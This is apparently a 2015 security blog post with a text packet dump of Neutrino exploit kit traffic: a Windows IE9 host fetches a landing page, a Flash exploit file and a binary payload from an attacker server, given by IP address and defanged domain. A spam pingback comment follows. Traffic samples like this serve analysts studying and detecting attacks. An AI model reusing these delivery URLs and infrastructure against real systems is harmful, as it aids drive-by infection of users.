Neutrino EK Web based exploit kit – Vulnerable version of flash PCAP Traffic Sample

By | June 22, 2015

2015-01-26 14:18:38.069043 IP 192.168.221.165.53146 > 192.168.221.2.53: 58797+ A? pelilg.efrai2[.]eu. (34)
E..>……………….5.*.q………….pelilg.efrai2[.]eu…..
2015-01-26 14:18:38.239346 IP 192.168.221.2.53 > 192.168.221.165.53146: 58797 1/0/0 A 108.61.197.150 (50)
E..N ……”………5…:……………pelilg.efrai2[.]eu……………..l=..
2015-01-26 14:18:38.240418 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [S], seq 3183806509, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…(…..l=….o….-…… ……………..
2015-01-26 14:18:38.240919 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [S], seq 1761112290, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…(…..l=….o.h.p……. .u……………
2015-01-26 14:18:38.366092 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [S.], seq 2064132039, ack 3183806510, win 64240, options [mss 1460], length 0
E.., …..a.l=……o…{.’…..`…4V……..
2015-01-26 14:18:38.366263 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [.], ack 1, win 64240, length 0
E..(..@…(…..l=….o…..{.’.P…L………
2015-01-26 14:18:38.366645 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [P.], seq 1:445, ack 1, win 64240, length 444
E…..@…’…..l=….o…..{.’.P…&…GET /feeling.phtml?fumble=14777&spell=25068&jordan=14923&stupid=13334&arrangement=18494&awaken=47391&defeat=43164&flicker=52172&convince=83054&five=77037 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pelilg.efrai2[.]eu:28623
Connection: Keep-Alive
2015-01-26 14:18:38.366794 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [.], ack 445, win 64240, length 0
E..( …..a.l=……o…{.’… .P…JW……..
2015-01-26 14:18:38.380901 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [S.], seq 1969550510, ack 1761112291, win 64240, options [mss 1460], length 0
E.., …..a
l=……o…ud..h.p.`…Y)……..
2015-01-26 14:18:38.381050 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [.], ack 1, win 64240, length 0
E..(..@…(…..l=….o.h.p.ud..P…p………
2015-01-26 14:18:38.533812 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 1:744, ack 445, win 64240, length 743
E… …..^#l=……o…{.’… .P…kH..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

1fc
………..RMo.1…W..”..;$Q?.n.H.@*PAP.q..t.z..=.M…x..D..^f…x……….5…t.n…..`|$..t!…*.31~….`…….9.%Q.F…D7…..WYReg.:.Ph.|>.z.7.z>`…..y&.MX…/9…..|.j..F.]……pK…L…R..jt.;.k..MC.b.c..6.P..W..pX.V.;wo….r..1iM.d.V.X.”9…’..G…..L1…x……X.~…K~…P=’.(………i.lW9…[.`…Q`…pP
C….`…{.@.M..>Ws ..}.Ra..P…;8.U……\….+ 4o5…..[…..Z?.W..U>=….. …….a.Fa..ki..S~q69=……NW……….w…..&s!…W`.F…..fxr..Wi..-g2.oV8………..’..H……..?0g#.e…
0
2015-01-26 14:18:38.637780 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 1:744, ack 445, win 64240, length 743
E… …..^”l=……o…{.’… .P…kH..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

1fc
………..RMo.1…W..”..;$Q?.n.H.@*PAP.q..t.z..=.M…x..D..^f…x……….5…t.n…..`|$..t!…*.31~….`…….9.%Q.F…D7…..WYReg.:.Ph.|>.z.7.z>`…..y&.MX…/9…..|.j..F.]……pK…L…R..jt.;.k..MC.b.c..6.P..W..pX.V.;wo….r..1iM.d.V.X.”9…’..G…..L1…x……X.~…K~…P=’.(………i.lW9…[.`…Q`…pP
C….`…{.@.M..>Ws ..}.Ra..P…;8.U……\….+ 4o5…..[…..Z?.W..U>=….. …….a.Fa..ki..S~q69=……NW……….w…..&s!…W`.F…..fxr..Wi..-g2.oV8………..’..H……..?0g#.e…
0
2015-01-26 14:18:38.637950 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [.], ack 744, win 63497, length 0
E..(..@…(…..l=….o… .{.*.P.. JW……..
2015-01-26 14:18:38.864402 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [P.], seq 1:506, ack 1, win 64240, length 505
E..!..@…&…..l=….o.h.p.ud..P…o<..GET /several.asp?determine=ladder&handkerchief=37049&mistake=toward&slice=about&cart=97268&breathe=lawn HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://pelilg.efrai2[.]eu:28623/feeling.phtml?fumble=14777&spell=25068&jordan=14923&stupid=13334&arrangement=18494&awaken=47391&defeat=43164&f
x-flash-version: 11,4,402,287
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: pelilg.efrai2[.]eu:28623
Connection: Keep-Alive
2015-01-26 14:18:38.864505 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [.], ack 506, win 64240, length 0
E..( …..a.l=……o…ud..h.r.P…n………
2015-01-26 14:18:39.085050 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [P.], seq 1:1356, ack 506, win 64240, length 1355
E..s …..[.l=……o…ud..h.r.P….S..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:38 GMT
Content-Type: application/x-shockwave-flash
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5

f46
2015-01-26 14:18:39.332467 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [P.], seq 42182:42679, ack 506, win 64240, length 497
E… …..^.l=……o…ue.th.r.P……..1….v..dvE.MX….v
y.E*a..:.l1E G…%…2……..1.R…P F…f……..!\./.8W.9…..Ks.C….9.v……
W.(……….{.]E.P.rX….Pfg.`…..M.x)f….>..\_….(..Dt.99N.”.Z.d.#+…jE6…..(..x….l…p.,q…..(3..|….B……..f.N?rz=.:…….t{..V…3…… 1.zEn….H..W..;G6*.5wH.o..GS..W..@m.*……a….M…b.&+.?………_a_—…_a_-_…_a_-_-__…phahckimhxzyoud$ee131993047ba2072adcb7165a63498a1571655012…vmqvhomaff$143e186a389fe713e5bbae7f8fe59a5a1940012711…rcctxojtwy.@….\h?
0
2015-01-26 14:18:39.332591 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [.], ack 42679, win 64240, length 0
E..(.
@…(…..l=….o.h.r.ue.eP….6……..
2015-01-26 14:18:39.930757 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [P.], seq 445:1053, ack 744, win 63497, length 608
E…..@…&?….l=….o… .{.*.P.. ….GET /down/37050/furious/highest/splash/moonlight/connect/thirteen/short/goodness/fortunate/16523/arrive/49435/cliff/door/deal/conversation/coffee/flare/ HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://pelilg.efrai2[.]eu:28623/feeling.phtml?fumble=14777&spell=25068&jordan=14923&stupid=13334&arrangement=18494&awaken=47391&defeat=43164&flicker=52172&convince=83054&five=77037
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pelilg.efrai2[.]eu:28623
Connection: Keep-Alive
2015-01-26 14:18:39.930793 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [.], ack 1053, win 64240, length 0
E..( …..`.l=……o…{.*….JP…E………
2015-01-26 14:18:40.091005 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 744:998, ack 1053, win 64240, length 254
E..& ….._.l=……o…{.*….JP….<..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

14
………………..
0
2015-01-26 14:18:40.179870 IP 192.168.221.165.49183 > 108.61.197.150.28623: Flags [S], seq 1050760563, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…(…..l=….o.>.Us…… ……………..
2015-01-26 14:18:40.193919 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 744:998, ack 1053, win 64240, length 254
E..& ….._.l=……o…{.*….JP….<..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

14
………………..
0
2015-01-26 14:18:40.194048 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [.], ack 998, win 63243, length 0
E..(..@…(…..l=….o….J{.+.P…G………
2015-01-26 14:18:40.297121 IP 108.61.197.150.28623 > 192.168.221.165.49183: Flags [S.], seq 1872247031, ack 1050760564, win 64240, options [mss 1460], length 0
E.., …..`.l=……o…o.8.>.Ut`…`o……..
2015-01-26 14:18:40.297282 IP 192.168.221.165.49183 > 108.61.197.150.28623: Flags [.], ack 1, win 64240, length 0
E..(..@…(…..l=….o.>.Uto.8.P…x,……..
2015-01-26 14:18:40.297533 IP 192.168.221.165.49183 > 108.61.197.150.28623: Flags [P.], seq 1:312, ack 1, win 64240, length 311
E.._..@…’c….l=….o.>.Uto.8.P…….GET /faith.pl?bile=demand&officer=17945&morrow=handkerchief HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pelilg.efrai2[.]eu:28623
2015-01-26 14:18:40.297543 IP 108.61.197.150.28623 > 192.168.221.165.49183: Flags [.], ack 312, win 64240, length 0
E..( …..`.l=……o…o.8.>.V.P…v………
2015-01-26 14:18:40.522608 IP 108.61.197.150.28623 > 192.168.221.165.49183: Flags [P.], seq 1:1356, ack 312, win 64240, length 1355
E..s …..[.l=……o…o.8.>.V.P…….HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:40 GMT
Content-Type: application/octet-stream
Content-Length: 376832
Connection: keep-alive
Last-Modified: Mon, 26 Jan 2015 17:34:58 GMT
ETag: “54c67ac2-5c000”
Accept-Ranges: bytes

Share Button

6 thoughts on “Neutrino EK Web based exploit kit – Vulnerable version of flash PCAP Traffic Sample

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

Leave a Reply

Your email address will not be published. Required fields are marked *